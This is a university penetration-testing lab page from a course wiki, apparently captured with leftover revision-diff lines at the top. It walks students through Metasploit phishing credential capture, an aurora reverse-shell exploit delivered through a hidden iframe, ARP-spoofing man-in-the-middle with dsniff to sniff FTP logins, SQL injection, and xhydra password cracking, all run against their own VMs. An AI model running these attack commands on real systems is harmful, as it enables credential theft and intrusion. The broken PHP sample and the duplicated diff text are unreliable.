{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
 
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility).
 
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility).
 
|}}
 
|}}
 
<br>
 
<br>
<ol>
+
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
+
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
+
 
</ol>
 
 
<br />
 
<br />
 
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
 
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
Line 312: Line 305:
 
|}}
 
|}}
 
<br />
 
<br />
<ol>
+
 
+
<li value="19">Record your findings in your lab log-book.</li>
<li value="19">Record your findings in your lab log-book.</li>
+
<li>Proceed to the "Completing the Lab".</li>
<li>Proceed to the "Completing the Lab".</li>
 
 
</ol>
 
</ol>
  
 
<p><b>Answer Task #4 observations / questions in your lab log book.</b>
 
<p><b>Answer Task #4 observations / questions in your lab log book.</b>
</p><p><br>
+
</p><p><br>
 
</p>
 
</p>
  
Line 327: Line 319:
 
</p>
 
</p>
 
<ol>
 
<ol>
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
+
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
+
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
<li>Demonstation of <b>prevention from Data Injection Attack</b>.</li>
+
<li>Demonstation of <b>prevention from Data Injection Attack</b>.</li>
<li>Completed Lab 4 notes.</li>
+
<li>Completed Lab 4 notes.</li>
 
</ol>
 
</ol>
 
<p><br>
 
<p><br>
Line 337: Line 329:
  
 
<ol>
 
<ol>
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
+
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
<li>Define the term <b>Man in the Middle</b> attack.</li>
+
<li>Define the term <b>Man in the Middle</b> attack.</li>
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
+
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
+
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
+
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
+
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
 
</ol>
 
</ol>

Revision as of 16:18, 31 January 2018

Types of Attacks

Introduction


In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (eg. Metasploit) to gain access to your Windows server.

In this lab, students will learn other methods of vulnerability testing to gain access to vulnerable servers:

  • This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
  • First, students will be exposed to Client-side attacks (usually initiated by the server's users) including Malicious web-page Payloads, and IP Spoofing (Man in the Middle) attacks.
  • Then, students will focus on Server-side attacks such as Server-side Injection, and Password attacks.



Objectives

  1. Access a server by creating a webpage using the <iframe> tag to redirect a user to a Metasploit exploit in order to gain access to the computer system.
  2. Understand how phishing can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
  3. Perform IP Spoofing (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
  4. Access and manipulate a database server to gain access into the targeted server.
  5. Use a password cracking program to discover and access user accounts, and possibly root access.


Required Materials (Bring to All Labs)

  • SATA Hard Disk (in removable disk tray).
  • Lab Logbook (Lab6 Reference Sheet) (to make notes and observations).


Prerequisites


Online Tools and References


Course Notes


Performing Lab 4


Stop (medium size).png
CAUTION!
Scanning ports and exploiting servers must

require the permission of Server Owner (preferably in writing). Students

must either use their VMs, use the IFS lab (if available), or sign an agreement to use the Tank server when practising these computer system intrusion methods.


Task #1: Web-browser Redirect (Phishing) Attacks


This section will demonstrate the vulnerability of a computer system with one of its weakest links: Humans. You will be using the Metasploit framework to create an attack on your server that will exploit and gain access to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
INSTRUCTIONS:

Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the Armitage frontend, other strategies such as lurking to gain access (via reverse shell) by redirecting web-browser traffic are also available.

In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:

Idea.png
Using The MSF Console

msfconsole is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!

We will be running the msfconsole command to access the command shell, and setup a typical phishing attack.


  1. Login as root user, and issue the command: msfconsole (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.
    Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
  2. In the msfconsole, issue the following commands:
		use auxiliary/server/capture/http_basic
		show options
		set REALM Facebook Gateway
		set URIPATH /
		run
	
  1. Note the LOCAL IP ADDRESS. You will be entering that address in a web-browser on your targeted Windows server.
  2. Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.
Important.png
Disable Internet Explorer Enhanced Security
In order to demonstrate this attack, we will disable Internet Explorer Enhanced Security. Perform the instructions below to disable this feature.


  1. Switch to your vulnerable Windows server, make certain that you are logged in as Administrator.
  2. Open the Control Panel, select Add or Remove Programs, select Add/Remove Windows Components. Click to select Internet Explorer Enhanced Security Configuration and click Details. Unclick the checkboxes for admin and all other users and then click Next.
  3. Login into a regular user account and open a web-browser.
  4. Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box
  5. Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?
  6. Did you think it would be harder to exploit a machine in this way?
  7. How popular do you think this type of human-based attack is?
  8. How can you prevent this type of attack from occurring on a "hardened system"?
  9. Record your findings in your lab log-book.



Idea.png
The Phishing Attack (For Interest Only)



WARNING! Only try this for penetration testing on your VMs or on servers that you have permission to perform penetration testing!

Only You have created a mechanism to gain access to a vulnerable system by using the targeted system's web-browser. All the penetration tester needs to do, is to set an elaborate "trap" to redirect the user to your host's IP_ADDRESS, disguised as a regular link.

Here is how simple (subtle) it can be:

  1. Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:
    • use windows/browser/ms10_002_aurora
    • set generic/shell_reverse tcp
    • set LHOST (your attack host IP ADDRESS)
    • set URIPATH /
    • set LPORT 7371
    • set SRVPORT 80
    • exploit
  2. Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy such as e-mail usernames and facebook accounts.
  3. Here is a link to sample HTML code: Template of e-mail attachment
  4. Edit the file to contain the following iframe (that will draw the user to your attack website):

     <iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"> </iframe>
    		
  5. We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).

    Another approach would be to send a "phony" notification with links to the facebook "login" page with the <iframe> element.

  1. Proceed to Task #2

Answer the Task #1 observations / questions in your lab log book.



Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing


This section will demonstrate an IP Spoofing attack (sometimes referred to as "arp poisoning") where the target server is "tricked" into communicating with a server that assumes has the correct MAC address. The attacker can then "feed packets" to the destination allowing for an uninterupted session to obtain information such as usernames and passwords.

INSTRUCTIONS:

  1. We will be using your Kali Linux host machine, Vulnerable Windows VM, and Vulnerable Linux VM for this section.
  2. Note the IP Address of your Windows server.
  3. Make certain that your Windows machine is running an FTP

    server. Set up the FTP server to only allow users to access the FTP

    server by username and password (possibly not required from default installation and startup).
  4. For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: ping LINUX_IP_ADDR -t

    You should now see proof of a connection between your vulnerable Windows and Linux servers.
  5. Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.
  6. Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: ping WINDOWS_IP_ADDR
  7. We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.
  8. Switch to your Kali Linux (host) server, and open a shell terminal.
  9. While in the host (attack) machine, issue the following Linux command:

    sudo arpspoof -t    WINDOWS_IP_ADDR    LINUX_IP_ADDR

  10. We need to continue the "man in the middle" attack by now performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following Linux command:

    sudo arpspoof -t    LINUX_IP_ADDR_LINUX    WINDOWS_IP_ADDR

  11. Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.

Important.png
Connection Disconnected
When initionally performing an

"IP Spoof", the connection between the machines is temporary broken. In

order to re-establish a connection (via the "man in the middle") the attacker must establish IP FORWARDING.


  1. To complete the "man in the middle" attack, you are required to establish IP FORWARDING. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:

    sudo su           # login with admin passord
    echo 1 > /proc/sys/net/ipv4/ip_forward

    (This means to set IP FORWARDING to "True" or "On")

  2. Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.

Important.png
Obtaining Username / Password Information
One of the main reasons for a "man in the middle" attack is to obtain sensitive information such as a username and password for further exploitation. A Packet Sniffer is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there is an ambundence of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called dsniff.


  1. On an available shell terminal on your host (attack) server, and issue the following Linux command: dsniff
    (tip: Use the command: find -P . | grep dsniff to locate dsniff superuser executable)
  2. This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.
  3. Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.
Important.png
FTP Doesn't Work / Alternative Arp Posioning Method

Students have noticed that when using Kali Linux as a host machine for the vulnerable Windows and Linux VMs they experience a problem when using the arpspoof command. You can use the ettercap command as an alternative command which does not require port forwarding and performs the dsniff command as well.

To run the ettercap command, issue the following command: ettercap -T -M arp /// /// -i vboxnet0

  1. Then switch back to your host (attack) server.
  2. What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.
  3. Return to your vulnerable Linux server, and close the FTP connection with the Windows server.
  4. Switch back to your attack server. What information does dsniff provide?
  5. What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?
  6. Record your findings/answers in your lab log-book.
  7. Proceed to Task #3

Answer Task #2 observations / questions in your lab log book.



Task #3: Database Injection Attack



SQL injection attacks are basically in the form of introducing or "injecting" malicious code via the input (form) for the SQL/MYSQL database, in order to gain access to the backend database. There are many different methods of injection attacks. We will demonstrate a fairly common method of injection attack which exploits a weakness for the MYSQL server (that fail to sanitize user input. In this case, the user inserting illegal characters (single quote i) within an established web-based database form.

In this section, we will only expose the student to the concept of an injection attack. You are NOT required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...

INSTRUCTIONS:

  1. Study the following PHP code below:
 <?php
	
	$user = $_POST['usr'];
	
	$user = "anything' OR x='x";
	
	mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
	
	?>
	


  1. How could this code be incorporated with an HTML document (using a form) to perform a database injection attack? Record your answer in your lab log-book.
  2. View the associated YouTube video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.
  3. Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:
 <?php
	
	$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;
	
	$user = "anything' OR x='x";
	
	mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
	
	?>
	
  1. Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.
  2. Proceed to Task #4.

Answer Task #3 observations / questions in your lab log book.



Task #4: Password Cracking Attack



In this section, you will learn another technique to crack passwords by obtaining usernames from e-mail addresses, and then running a password cracking program to hopefully gain access to an account on a vulnerable Windows server that contains a weak password. Then, after gaining access to the account, we will then use a series of techniques to gain access to the administrator's account.

INSTRUCTIONS:

  1. Go to your vulnerable Windows server, create a username called weak that contains a very weak password (no special characters, just words that could be contained in a dictionary).
  2. How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.
  3. Assuming that you have obtained a username (i.e. username: weak) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.

  4. Important.png
    Cain Password Dictionary
    A password cracking program requires a dictionary of common passwords. The file cain.txt is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.


  5. We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.

    Here is a link to various password cracking dictionaries: http://www.skullsecurity.org/wiki/index.php/Passwords

    As root, download the compressed file (cain.txt.bz2) to your /root directory.

  6. Decompress the file by issuing the following Linux command: bunzip2 cain.txt.bz2

  7. Important.png
    xhydra
    xhydra is a graphical frontend of a program

    that scans open ports, and attempts to crack account passwords that are weak using a dictionary file of potential passwords. Of course, you

    could have performed this task manually by using nmap to scan open ports, and use other password cracking tools (such as Cain and Able), but xhydra performs these operations automatically.



  8. To launch the xhydra application as root (unless you are already in root), issue the following Linux command: sudo xhydra

  9. In the initial application window (ie. Target tab), enter the WINDOWS_IP_ADDR in the Target textbox.
  10. Under the Protocol list-box, select ftp.
  11. In the Output Options section, check Be verbose, and check Show Attempts.
  12. Move to the next screen by clicking on the Passwords tab.
  13. In the Username section, type the username called weak.
  14. In the Password section, click on the passwords list radio button, and then click on the passwords list text-box in order to browse to the /root/cain.txt dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.
  15. At the bottom of the screen, check Try login as password, and click Try Empty Password.
  16. Click on the Start tab, and click on the Start button (at the bottom of the screen) to begin the attack.
  17. This attack may take several minutes to complete.
  18. Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.

  19. Important.png
    Gaining Root Access
    Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.

    For example with Linux systems, gaining access to the /etc/passwd file to list users with administrative privedges and gaining access to the /etc/shadow to attempt a crack the root password hash (via the John the Ripper utility).


  20. What sort of harm can be done to this organization if the root account has been hacked?
  21. What sort of password rules should be used to make it harder to penetrate this system?

  22. Important.png
    Sharpening Your Skills (hackthissite.org)

    If you are interested in practicing or "honing" your penetration skills, there is a site called http://www.hackthissite.org that allows students to play and practice their skills.

    WARNING: You ARE NOT SAFE in leaving personal information on the site. The owner of this site has served jail-time for FRAUD. There is also the possibility that a member of the hacker community may be able to access your personal information and use it for their personal advantage (at your expense).

    You have been warned!


  23. Record your findings in your lab log-book.
  24. Proceed to the "Completing the Lab".

Answer Task #4 observations / questions in your lab log book.


Completing the Lab

Arrange evidence for each of these items on your screen, then ask your instructor to review them and sign off on the lab's completion:

  1. Proof of Windows VM hack from Phishing / Malicious Code.
  2. Packet Sniffing information from Linux to Windows FTP connection.
  3. Demonstation of prevention from Data Injection Attack.
  4. Completed Lab 4 notes.


Preparing for Quizzes

  1. Briefly explain the purpose of a Phishing Attack. How can phishing relate to using malicious code?
  2. Define the term Man in the Middle attack.
  3. Briefly list the steps in a Database Injection attack.
  4. How can a dictionary file be used to crack passwords on a targeted server?
  5. What is a password hash? How can a password hash be cracked?
  6. What can an organization do to prevent passwords on their computer system from being cracked?